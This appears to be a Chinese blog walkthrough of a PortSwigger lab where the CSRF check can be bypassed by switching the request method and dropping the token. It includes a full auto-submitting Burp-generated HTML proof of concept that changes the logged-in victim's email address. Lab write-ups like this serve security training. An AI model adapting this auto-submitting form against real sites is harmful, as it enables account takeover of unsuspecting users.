burpsuite靶场----CSRF----无防御

靶场地址

https://portswigger.net/web-security/csrf/bypassing-token-validation/lab-token-validation-depends-on-request-method

正式开始

1.登录

2.抓包,发现有一段token

3.尝试删掉token,发现不行

4.尝试改变请求方式


发现也能实现功能

然后再把token参数删掉,也能实现

5.制作poc

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://0a990086031a78b8b8852db2002800f2.web-security-academy.net/my-account/change-email">
      <input type="hidden" name="email" value="wiener&#64;normal&#45;evil&#46;net" />
      <input type="submit" value="Submit request" />
    </form>
   <script>document.forms[0].submit();</script>
  </body>
</html>

6.提交

本栏目推荐文章
• 解决 DELPHI 中执行外部命令出现屏幕一闪的问题的方法
• SQL Server 检测是不是数字型数据的两种方法
• python字符串方法
• 引用CDN内容的方法总结
• 方法练习
• 方法
• 学习 Rust 的 15 种方法
• Chrome 浏览器插件 V3 版本 Manifest.json 文件中 Action 的类型（Types）、方法（Methods）和事件（Events）的属性和参数解析
• C# 方法中的 引用参数 ref out 的使用
• git bash报错fatal: detected dubious ownership in repository at的解决方法

靶场 取决于 burpsuite 方法 token靶场 取决于burpsuite token 靶场 取决于burpsuite方法 靶场burpsuite目录 靶场burpsuite信息sql 靶场burpsuite数据sql 靶场burpsuite信息 burpsuite_pro_v burpsuite 2023.9 token 靶场burpsuite时间oracle 靶场burpsuite xss xss1 靶场burpsuite服务器ssrf